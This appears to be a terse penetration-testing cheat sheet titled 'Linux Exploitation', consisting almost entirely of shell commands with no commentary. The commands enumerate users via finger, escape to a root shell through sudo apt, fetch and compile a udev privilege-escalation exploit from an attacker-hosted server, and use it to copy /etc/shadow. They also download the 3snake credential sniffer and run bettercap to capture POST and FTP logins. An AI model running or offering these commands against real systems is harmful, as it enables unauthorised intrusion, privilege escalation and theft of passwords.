Linux Exploitation

// Some code
nmap --script finger 1.2.3.4 -p79
finger username@1.2.3.4
for name in $(cat /usr/share/wordlists/metasploit/unix_users.txt); do finger $name@1.2.3.4; done > valid_users.txt

wget -c "https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py"
linuxprivchecker
python linuxprivchecker.py >enum
cat enum | less
sudo /usr/bin/apt edit-sources ../../../../tmp/foo
3
:!sh
whoami

python -c 'import pty; pty.spawn("/bin/sh")'
id
uname -a
dpkg -l | grep udev
python -m SimpleHTTPServer 80
wget -c http://1.2.3.4/8572.c
gcc --version
gcc 8572.c -o udev_exploit
chmod +x udev_exploit
ps aux | grep udev
cat /proc/net/netlink
echo -e '#!/bin/bash\n/bin/cat /etc/shadow > /tmp/shadow' > /tmp/run
./udev_exploit 2767
cat shadow
https://www.github.com/blendin/3snake
cd /tmp
wget -q https://www.github.com/blendin/3snake/archive/master.zip
unzip master.zip
cd 3snake-master
make
./3snake -h
cp /usr/ib/ruby/vendor_ruby/bettercap/sniffer/parsers/ftp.rb .
cp /usr/ib/ruby/vendor_ruby/bettercap/sniffer/parsers/post.rb .
bettercap -X -I eth0 -T 192.168.13.68,192.168.69.69 -P post,ftp

Last updated

Was this helpful?